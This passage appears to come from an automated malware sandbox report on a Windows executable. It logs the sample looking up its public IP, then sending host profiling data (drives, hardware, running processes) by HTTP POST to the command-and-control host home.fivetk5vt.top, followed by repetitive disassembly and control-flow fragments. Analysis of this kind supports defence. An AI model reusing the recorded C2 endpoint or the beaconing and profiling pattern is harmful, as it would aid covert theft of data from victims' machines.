Dec 20, 2024 17:18:13.345464945 CET | 1.1.1.1 | 192.168.2.10 | 0x82f9 | No error (0) | home.fivetk5vt.top |  | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                      • httpbin.org
                                                      • home.fivetk5vt.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49716 | 185.121.15.192 | 80 | 8120 | C:\Users\user\Desktop\j6Nv9kUydV.exe

Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:18:07.935301065 CET | 12360 | OUT | POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49717 | 185.121.15.192 | 80 | 8120 | C:\Users\user\Desktop\j6Nv9kUydV.exe

Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:18:09.960705996 CET | 12360 | OUT | POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49723 | 185.121.15.192 | 80 | 8120 | C:\Users\user\Desktop\j6Nv9kUydV.exe

Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:18:11.731297016 CET | 12360 | OUT | POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 442929
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711485", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                      Dec 20, 2024 17:18:11.970844984 CET4944OUTData Raw: 67 31 5c 2f 77 55 73 2b 48 6e 37 52 66 67 72 77 5c 2f 77 44 44 58 34 46 4a 34 44 67 5c 2f 62 63 5c 2f 5a 74 31 62 78 48 62 61 42 34 77 30 4c 34 79 65 44 66 44 48 67 62 77 50 6f 33 78 41 2b 4e 6e 77 64 38 50 36 66 66 65 4a 76 68 72 34 35 5c 2f 61
                                                      Data Ascii: g1\/wUs+Hn7Rfgrw\/wDDX4FJ4Dg\/bc\/Zt1bxHbaB4w0L4yeDfDHgbwPo3xA+Nnwd8P6ffeJvhr45\/aPtrfxJ4r8G\/EL4v+AfE3xAjvNT0DTdT+nZI0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1OnUoTr4rOMgzn6zXUrVVO
                                                      Dec 20, 2024 17:18:11.970876932 CET4944OUTData Raw: 4f 44 6a 57 72 55 31 4b 36 57 46 6a 51 6a 4f 58 4e 47 68 79 4a 51 50 35 53 38 4e 5c 2f 46 68 2b 48 48 69 72 6c 6e 69 66 6b 4f 55 59 56 56 73 6d 7a 71 74 6e 4f 57 35 4e 55 78 47 4d 2b 71 34 65 71 36 6a 72 34 66 44 75 74 55 78 4d 38 66 4f 68 51 71
                                                      Data Ascii: ODjWrU1K6WFjQjOXNGhyJQP5S8N\/Fh+HHirlnifkOUYVVsmzqtnOW5NUxGM+q4eq6jr4fDutUxM8fOhQqyhFOWMlipUoWeK9s\/any58MvEMXgL4o\/FP40\/tONYaJpXiz4c\/Af4j\/AAW+HXwz8H+JL34d\/D744fsPXnh\/VP2PPg14W8O6Jqepa54f+Gtt4YsNY+DUWp694j1NrLS\/EZ8TeP8AXde1T+0vEL+eeGPjDq


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.10 | 49729 | 185.121.15.192 | 80 | 8120 | C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 20, 2024 17:18:13.468884945 CET | 87 | OUT | GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                      Host: home.fivetk5vt.top
                                                      Accept: */*
                                                      Dec 20, 2024 17:18:14.742285013 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.10 | 49705 | 98.85.100.80 | 443 | 8120 | C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-20 16:18:05 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-20 16:18:06 UTC | 224 | IN | HTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 16:18:06 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-20 16:18:06 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}



                                                      Target ID:0
                                                      Start time:11:18:01
                                                      Start date:20/12/2024
                                                      Path:C:\Users\user\Desktop\j6Nv9kUydV.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\j6Nv9kUydV.exe"
                                                      Imagebase:0x700000
                                                      File size:4'495'360 bytes
                                                      MD5 hash:84E0E622857460DA96501532A233C862
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:11:18:14
                                                      Start date:20/12/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
                                                      Imagebase:0x5a0000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:0.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:0
                                                        execution_graph 15442 70d04ad 15443 70d04c2 Process32FirstW 15442->15443 15444 70d04f6 15443->15444 15444->15444 15445 7080d52 15446 7080d5e GetLogicalDrives 15445->15446 15447 7080d71 15446->15447 15448 70e03f4 15449 70e0402 Process32NextW 15448->15449 15450 70e0432 15449->15450
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 692836b6c7676b7a6c8ca51b5963174ba6df4053891ca4b584f818c6dfd5a052
                                                        • Instruction ID: 5f71e2c254f58778f228414f18fe40151e2ada28c9846d66dfc039635e38723d
                                                        • Opcode Fuzzy Hash: 692836b6c7676b7a6c8ca51b5963174ba6df4053891ca4b584f818c6dfd5a052
                                                        • Instruction Fuzzy Hash: 5A917BFB96C115BDF2418181AB54BFE676EE3D7730F308726F423E5502E2A80A899539
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01e1e3c1dd270d6188374d894daabbb3ffda30b65ae9592c6d9b3f2db3965fe2
                                                        • Instruction ID: 63a78379161ae0874a1a5d940ad49d084bdbc4417aba27b41db51ecd1e032539
                                                        • Opcode Fuzzy Hash: 01e1e3c1dd270d6188374d894daabbb3ffda30b65ae9592c6d9b3f2db3965fe2
                                                        • Instruction Fuzzy Hash: 1A51E1EB86C115BCB242C581AB50AFF676EE6C7330F30972AF467D5602E2940F89D179

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 70809cf-7080afb call 7080a7b 13 7080b07 0->13 14 7080b0c 13->14 15 7080b0d-7080d46 call 7080d43 14->15 16 7080af7-7080b05 14->16 40 7080d4d-7080d65 GetLogicalDrives 15->40 16->13 16->14 42 7080d71-7080fc7 call 7080e99 40->42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 3d046022549360f7f318a2a9a53e03b1ae4465f7a3a07553c36f95e63f7f77f4
                                                        • Instruction ID: 53b9f22d8a9ffddee45316f16d2ca8a4b90255833e6161de970d7638235dfe8e
                                                        • Opcode Fuzzy Hash: 3d046022549360f7f318a2a9a53e03b1ae4465f7a3a07553c36f95e63f7f77f4
                                                        • Instruction Fuzzy Hash: 97918DEB26C225BD7182A5856B54AFFA76EE5C3730B30C637F897D6602E2C84A4D1071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 68 70809e5-7080afb call 7080a7b 79 7080b07 68->79 80 7080b0c 79->80 81 7080b0d-7080d46 call 7080d43 80->81 82 7080af7-7080b05 80->82 106 7080d4d-7080d65 GetLogicalDrives 81->106 82->79 82->80 108 7080d71-7080fc7 call 7080e99 106->108
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: b18054ad9534867e51e3a86bc38c6fab224dd9f0cf92e6be0ccbb27e5c341750
                                                        • Instruction ID: 4a89c8e04a0a69dc7092aed812e49df6eb38ff1673507da35d4812495a21fb3c
                                                        • Opcode Fuzzy Hash: b18054ad9534867e51e3a86bc38c6fab224dd9f0cf92e6be0ccbb27e5c341750
                                                        • Instruction Fuzzy Hash: 7591AFEB25C225BDB282A5856B54AFF676EE5C3730B30C537F897D6602E2C84E4E1071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 134 7080a0d-7080a0e 135 70809ad-70809ce call 70809cf 134->135 136 7080a10-7080afb call 7080a7b 134->136 135->134 150 7080b07 136->150 151 7080b0c 150->151 152 7080b0d-7080d46 call 7080d43 151->152 153 7080af7-7080b05 151->153 177 7080d4d-7080d65 GetLogicalDrives 152->177 153->150 153->151 179 7080d71-7080fc7 call 7080e99 177->179
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 0a2753e1fe48ca1a9361995ed9a850e675ce32ec5854b5ef6562a797c80ee885
                                                        • Instruction ID: 7be36ddfef075a0304875ac18413fb14c64fe573b11a33a5d309931ff685dcd1
                                                        • Opcode Fuzzy Hash: 0a2753e1fe48ca1a9361995ed9a850e675ce32ec5854b5ef6562a797c80ee885
                                                        • Instruction Fuzzy Hash: 1991CEEB25C121BDB182A5856F64AFF676EE5C3730B30C637F893D6602E2C84A4D1031

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 205 7080a37-7080a3b 206 7080a3d-7080afb call 7080a7b 205->206 207 7080a00-7080a32 205->207 217 7080b07 206->217 207->206 218 7080b0c 217->218 219 7080b0d-7080d46 call 7080d43 218->219 220 7080af7-7080b05 218->220 244 7080d4d-7080d65 GetLogicalDrives 219->244 220->217 220->218 246 7080d71-7080fc7 call 7080e99 244->246
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: f2514578d1776e04ba90f11672606ec91aa8bb13dd95d32049dffca70dfe0957
                                                        • Instruction ID: 9d698ae8f0dddf7ff25ac701082452369aa7e23214207b353043051da69b0d2a
                                                        • Opcode Fuzzy Hash: f2514578d1776e04ba90f11672606ec91aa8bb13dd95d32049dffca70dfe0957
                                                        • Instruction Fuzzy Hash: 29919EEB26C125BDB282A5856B54AFF676EE5C3730B30C637F897D6602E2C84A4D1071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 272 7080a21-7080afb call 7080a7b 282 7080b07 272->282 283 7080b0c 282->283 284 7080b0d-7080d46 call 7080d43 283->284 285 7080af7-7080b05 283->285 309 7080d4d-7080d65 GetLogicalDrives 284->309 285->282 285->283 311 7080d71-7080fc7 call 7080e99 309->311
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: 4c3000a1230f04a76670106ec3b7b3208a561a2002c9a7c2fc6e868c290cbcea
                                                        • Instruction ID: e1898646007b4ce9574e1369faa5efea7416261241f6b7dfceb1564b61a05da4
                                                        • Opcode Fuzzy Hash: 4c3000a1230f04a76670106ec3b7b3208a561a2002c9a7c2fc6e868c290cbcea
                                                        • Instruction Fuzzy Hash: EE91ADEB25C125BDB182A5856B64AFF676EE5C3730B30C637F897D6602E2C84A4D1031

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 337 7080a7b-7080afb 342 7080b07 337->342 343 7080b0c 342->343 344 7080b0d-7080d46 call 7080d43 343->344 345 7080af7-7080b05 343->345 369 7080d4d-7080d65 GetLogicalDrives 344->369 345->342 345->343 371 7080d71-7080fc7 call 7080e99 369->371
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: 793c5b3a804def731f0a3cbd4694eed6df7cd1ea5369177be4462732bdb91f35
                                                        • Instruction ID: b2fddd71afda56f7784380e6a9110bcf41f18fe40ec221aa0d840a8706418c20
                                                        • Opcode Fuzzy Hash: 793c5b3a804def731f0a3cbd4694eed6df7cd1ea5369177be4462732bdb91f35
                                                        • Instruction Fuzzy Hash: BC819DEB25C125BDB182A5856B64AFF676EE5C3730B30C637F897D2602E2C84A4D5071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 397 7080a8a-7080afb 402 7080b07 397->402 403 7080b0c 402->403 404 7080b0d-7080d46 call 7080d43 403->404 405 7080af7-7080b05 403->405 429 7080d4d-7080d65 GetLogicalDrives 404->429 405->402 405->403 431 7080d71-7080fc7 call 7080e99 429->431
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959
                                                        • Opcode ID: d5eed1113e1a4df77416b0924905561ef27ea5e5ac86e6a9ccab60905ef7c337
                                                        • Instruction ID: 2b210b1c2acdf2a82846f00cce92d6eb8c0086c520c2a276f1a27f556c032f5c
                                                        • Opcode Fuzzy Hash: d5eed1113e1a4df77416b0924905561ef27ea5e5ac86e6a9ccab60905ef7c337
                                                        • Instruction Fuzzy Hash: 2481AEEB25C125BDB182A5856F64AFF676EE6C3730B30C537F897D2602E2C84A4D5031

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 516 7080b21-7080b22 517 7080b2e-7080b34 516->517 518 7080b24 516->518 521 7080b35-7080d46 call 7080d43 517->521 519 7080abe-7080afb 518->519 520 7080b26-7080b2a 518->520 524 7080b07 519->524 520->517 549 7080d4d-7080d65 GetLogicalDrives 521->549 526 7080b0c 524->526 528 7080b0d-7080b1c 526->528 529 7080af7-7080b05 526->529 528->521 529->524 529->526 551 7080d71-7080fc7 call 7080e99 549->551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: d1166a3598c33bcddfe24ad55b6337886d5fb5f6803a0978165ce881085c3325
                                                        • Instruction ID: 70090084a234a99d0a0cf24fb95df7fb04fa6d84337f6e39c8d5f5a5677a635f
                                                        • Opcode Fuzzy Hash: d1166a3598c33bcddfe24ad55b6337886d5fb5f6803a0978165ce881085c3325
                                                        • Instruction Fuzzy Hash: 0A81E1EB25C215BD7182E5856B54AFF676EE6C3730B30C627F897C6602E2C84E4D5071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 457 7080aa0-7080afb 461 7080b07 457->461 462 7080b0c 461->462 463 7080b0d-7080d46 call 7080d43 462->463 464 7080af7-7080b05 462->464 488 7080d4d-7080d65 GetLogicalDrives 463->488 464->461 464->462 490 7080d71-7080fc7 call 7080e99 488->490
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959
                                                        • Opcode ID: ff28c5f40fe2743db0e11719515e60f4c482a62900ae534b18bdda2d757af714
                                                        • Instruction ID: 0278cc8e2cf218cbf53980cf2cdb5ab2c8c224938013c5a419e11b5344e6efb4
                                                        • Opcode Fuzzy Hash: ff28c5f40fe2743db0e11719515e60f4c482a62900ae534b18bdda2d757af714
                                                        • Instruction Fuzzy Hash: 0D81B0EB25C125BDB182A5856B54AFF676EE5C3730B30C637F897D2602E2C84A4D5071

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 577 7080aa8-7080afb 580 7080b07 577->580 581 7080b0c 580->581 582 7080b0d-7080d46 call 7080d43 581->582 583 7080af7-7080b05 581->583 607 7080d4d-7080d65 GetLogicalDrives 582->607 583->580 583->581 609 7080d71-7080fc7 call 7080e99 607->609
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959

                                                        Control-flow Graph

                                                        control_flow_graph 635 7080b3d-7080b40 636 7080adb-7080afb 635->636 637 7080b42-7080b44 635->637 638 7080b07 636->638 639 7080b46-7080d46 call 7080d43 637->639 640 7080b0c 638->640 665 7080d4d-7080d65 GetLogicalDrives 639->665 642 7080b0d-7080b38 640->642 643 7080af7-7080b05 640->643 642->639 643->638 643->640 667 7080d71-7080fc7 call 7080e99 665->667
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 0-841859959

                                                        Control-flow Graph

                                                        control_flow_graph 693 7080ad3-7080afb 694 7080b07 693->694 695 7080b0c 694->695 696 7080b0d-7080d46 call 7080d43 695->696 697 7080af7-7080b05 695->697 721 7080d4d-7080d65 GetLogicalDrives 696->721 697->694 697->695 723 7080d71-7080fc7 call 7080e99 721->723
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: !S$A:\$A:\
                                                        • API String ID: 999431828-841859959

                                                        Control-flow Graph

                                                        control_flow_graph 749 7080b00-7080b05 750 7080b0c 749->750 751 7080b07 749->751 752 7080b0d-7080d46 call 7080d43 750->752 753 7080af7-7080aff 750->753 751->750 776 7080d4d-7080d65 GetLogicalDrives 752->776 753->749 778 7080d71-7080fc7 call 7080e99 776->778
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362

                                                        Control-flow Graph

                                                        control_flow_graph 804 7080b12-7080d46 call 7080d43 827 7080d4d-7080d65 GetLogicalDrives 804->827 829 7080d71-7080fc7 call 7080e99 827->829
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362

                                                        Control-flow Graph

                                                        control_flow_graph 855 7080b4e-7080d46 call 7080d43 875 7080d4d-7080d65 GetLogicalDrives 855->875 877 7080d71-7080fc7 call 7080e99 875->877
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A:\$A:\
                                                        • API String ID: 0-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
